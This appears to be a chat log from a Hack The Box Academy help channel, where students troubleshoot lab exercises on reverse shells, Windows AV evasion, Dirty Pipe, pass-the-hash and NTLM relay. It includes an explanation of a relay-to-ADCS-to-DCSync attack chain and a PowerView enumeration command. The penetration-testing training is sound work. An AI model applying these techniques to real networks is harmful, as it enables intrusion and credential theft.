On attacking common applications skills assessment i have skills assessment but only command i can get working is DIR i am wondering how to get a shell back to my listener. I was thinking to use certutil and download nc.exe and do it that way but I have tried and cannot get it to work

fathom pendant
#

:)

calm obsidian
#

The question asked for a shell lol I will try to just read the flag from the injection

fathom pendant
#

Does it? It's been a minute

tacit bay
#

I'm on windows evasion SA1 - my payload passes both checks, but seems to get some sort of timeout error in the logs? If I run it manually on the host it runs fine, any advice?

calm obsidian
#

Exploit the application to obtain a shell and submit the contents of the flag.txt file on the Administrator desktop.

fathom pendant
#

Ah yeah

#

It's been a minute

storm shard
#

can someone help me with a question in intro to assembly?

calm obsidian
#

Anyone able to help me?

gray yacht
fathom pendant
calm obsidian
#

ive tried to inject dir C:\ and different drives can't get anything at all

tawdry orchid
#

What is the latest Python version that is installed on the target?

storm shard
fathom pendant
storm shard
#

stepped into the exit function but the hex values I have tried aren't working ?

fathom pendant
fathom pendant
storm shard
#

No just 0x######

#

just got it, ty tho!

#

for some reason gef has the top address of the stack colored by the "code" color instead of stack?

opal nexus
gray yacht
tribal plinth
opal nexus
reef pecan
#

More of a general question, other escape characters work, but \n, likely due to the slash itself, causes curl to never be send. End just creates new lines...

I am onFish terminal

soft reef
nimble tangle
#

hello guys i just took student plan in htb academy and i am hesitated should i take soc analyst job role path or the soc analyst prequesits in skill path?

winter schooner
#

can anyone helo me when im trying to do

~C in the ssh promp its not dropping me into,

ssh>

so i cant port forward
but instead it gives me commandline disabled error, but ippsec does it in the same box im doing, and it works.

winter schooner
winter schooner
#

Bro i asked in boxes nobody answered so im asking here but its same as port forwarding and tunneling module

soft reef
#

Ok dm me.

soft reef
#

Is you mean to hosts file, no port.

#

Have you added inlanefreight.htb to your hosts file with the target ip:port?

viral snow
#

Attacking Enterprise Networks - Post Exploitation

I'm in question 2

I cloned CVE-2022-0847
Then I did cat exploit-2.c | xclip -se c

But when I go back to the ssh, I run gcc exploit-2.c -o dirtypipe I get a fatal error message, no such file or directory

Anyone else finish this one? Any help, please?

soft reef
viral snow
compact matrix
#

has anyone had issues with the phishing room in XSS?

soft reef
compact matrix
#

he server atxx.xx.xx.xx is taking too long to respond.
The site could be temporarily unavailable or too busy. Try again in a few moments.
If you are unable to load any pages, check your computerโ€™s network connection.
If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access the web.

viral snow
gray yacht
viral snow
#

I have to step out, and pick up my daughter. But I can try http.server

compact matrix
viral snow
#

But can you explain how?

gray yacht
compact matrix
gray yacht
warm obsidian
#

Hello, I'm currently working on Detecting windows attacks with splunk and im stuck on this question "Use the "dns_exf" index and the "bro:dns:json" sourcetype. Enter the attacker-controlled domain as your answer. Answer format: ." I'm not asking for the answer, I would like to be guided in the right direction if possible. Every answer I came up with was in correct. I'm also not sure what the answer format should be.

compact matrix
#

why is it not working for me

gray yacht
compact matrix
#

and now Im having this issue with this randomly

gray yacht
gray yacht
compact matrix
gray yacht
compact matrix
#

where do I do that again

gray yacht
tacit bay
#

Can someone help me out for "Introduction to Windows Evasion Techniques" module? I'm on Skills Assessment I - If I run my payload using the LOLBIN directly on the victim host, it works fine & I get a reverse shell - all undetected & passing YARA rules, but if I wait for the automated user to run it, within the log.txt file it says timeout?

quasi wave
#

hi I am doing question 3 for the intro to the pass the hash section under password attacks and when I do what the instructions say it does not give me David's hash

#

I managed to get in via rdp and I can run the cmd.exe

#

but I cannot seem to get David's hash to show up even tho I did exactly what the section says to do as far as I can tell

#

can someone help me out here?

tacit bay
#

can I DM? In a similar position I think

gloomy lichen
gray yacht
# quasi wave

Not sure as the screenshot doesn't show your mimikatz command or output. You can DM that stuff if you'd like.

plush viper
#

Can somebody please help with "Q: What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word) "
Module: Active Directory Directory Penetration Testing
Section: ACL Enumeration.

I have enumerated the ObjectAceType but the portal is not accepting the answer.
||I am trying bf9679c0-0de6 as an answer and also the AddSelf-GenericWrite which from bloodhound|| but both answers are incorrect.

plush viper
#

Ya, that powerview output in the screenshot
This is the command i ran "Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}" where $sid is SID of forend

gray yacht
potent kelp
potent kelp
#

Sounds good, let me know if it works

gray yacht
#

Yeah you don't need to DM was gonna mention GUIDs,

green minnow
#

attempting to do basic HTB module target
need to get root access as user2
search for SUIDs and use GTFObins to try and abuse them for 30 minutes
the id_rsa file sitting in roots home that user2 can access: FeelsWeirdMan

marsh ruin
plush viper
safe star
rustic sage
#

There was a Domain searching website in the CPTS path with like 30 search boxes on it. Anyone have that link handy? I just searched back through the course and can't find it

rustic sage
shut vapor
#

I immediately knew what you meant by "30 search boxes on it" ๐Ÿคฃ
Still took a little digging through my notes to find it tho.

plush viper
warm crater
#

<@&861185840277487616>

potent kelp
vapid thistle
#

I seem to have regular problems when I try to do web related exercises (SQLi, SQLMap etc) from my PC. When I use the pwnbox, I do not have any kind of issue, but from my PC it does nto work, or the answer hangs forever. Is it because of cloudfare or something filtering this kind of attacks?

cloud urchin
#

no, probably something else

vapid thistle
#

Well from my PC i have this kind of output from SQLMap:
[CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
But this output is not present when I run from the pwnbox

cloud urchin
#

i've never seen cloudflare pop up at all ever on any htb boxes

#

if the pwnbox can do it you should be able to as well

vapid thistle
#

Yeah well, the behaviour is completely different for the same input and it happened as well on other modules too.

cloud urchin
#

are you tunneling traffic through some kind of vpn?

vapid thistle
#

Not at all.

cloud urchin
#

not sure then, maybe reach out to support on the website

vapid thistle
#

Will do. Thank you for trying to help me ๐Ÿ™‚

normal sand
#

Module: Attacking Common Services

I was just going through my notes and came across this attack vector that I'd completely forgotten about. In the section I've linked below, it states that if you're unable to crack the hash captured with responder, you should try relaying the hash.

In the example provided, they switch off SMB in responder's configuration and run the impacket-ntlmrelayx tool. In the command, the parameter -t specifies the target. How do I know what to target? Do I just target a server on the network with the SMB service?

Also, impacket-ntlmrelayx is run independently and not side-by-side with responder, right?

Link to section: https://academy.hackthebox.com/module/116/section/1167

west canopy
#

If you want to narrow it down, spin up a local web server with DVWA or some other vulnerable web app, and see if you can run SQLMap against it locally .

tropic tulip
#

following directions i tried a sudo updatedb and tried to use the student password to get into the machine (seeing if it would work not expecting anything of it) and it said that the student account wasnt allowed and the incident would be reported >.>...is that just on the machine and i have nothing to worry about oor... >.>

west canopy
tropic tulip
west canopy
#

if its Linux Fundamentals, the htb-student user does not have sudo permissions

#

you can check by running sudo -l

#

we are punishing you by making you use the find command instead

tropic tulip
#

thats exactly the one im on find/locate lol

tropic tulip
#

wait...i dont know anymore ๐Ÿคฆโ€โ™‚๏ธ

west canopy
#

or its a perfectly beautiful lowercase L

tropic tulip
#

it just tried to have me login then i tried I

west canopy
# normal sand Module: Attacking Common Services I was just going through my notes and came ac...

it depends on the attack. For example, in active directory you might be able to use something like PrinterBug to make a domain controller connect to you (via SMB). That connection is then relayed to an ADCS server, and the result is that you, the attacker, obtain a certificate saying you are the domain controller (as the machine account i.e. DC01$) . From there, you can DCSync the actual domain controller. Because the domain controller can't tell the difference between itself and you .

#

We have an entire module on NTLM Relay Attacks if you're interested. It's pretty gnarly.

#

But yes there are times you can run both ntlmrelayx and responder at the same time.

normal sand
normal sand
normal sand
white shadow
#

Why does general chat redirect me here?

storm elk
west canopy
white shadow
normal sand
west canopy
#

so we could have Responder do LLMNR poisoning, while ntlmrelayx actually catches the hash and then relays it .

normal sand
#

Ahh, wait, it shouldn't affect the poisoning aspect, only responder's ability to handle SMB-based NTLM relays?

west canopy
#

SMB = off just make it so responder isn't actively listening on port 445. But it will still broadcast itself out as whatever mis-typed resource the victim tries to access.

#

so the victim tries to access \servr01\share . He mispells server01 . AD is stupid so it broadcasts to the entire network "who is servr01" ?

#

Responder tells the victim, I am servr01 . So the victim then authenticates to us via SMB. If we want to relay it, then we use ntlmrelayx. But if we just want to capture the hash and try to crack it, then we only use responder, but have SMB = On

normal sand
west canopy
#

well i guess that doesn't make AD stupid. Just netbios and LLMNR. AD is stupid for a bunch of other reasons

normal sand
west canopy
#

In this example, its showing a hypothetical scenario where an administrator (from 10.10.110.1) somehow tries to connect to us via SMB, but then we relay it to another host (10.10.110.146)

#

In this case, responder has SMB = Off , because we need ntlmrelayx to be listening on port 445.

normal sand
west canopy
#

there's quite a bit of nuance to it

white shadow
#

Sorry to interrupt your conversation โ€” I have a question. If I buy cubes on HackTheBox for any amount, will that give me unlimited access to the online attack-boxes, or do I specifically need to purchase the subscription?

I can't download Kali or Parrot right now, as the computer I'm using belongs to the school, and I don't have admin privileges.

cloud urchin
white shadow
#

Okay, thank you

brave scroll
#

getting this error again &again

normal sand
west canopy
#

all the commands should work the same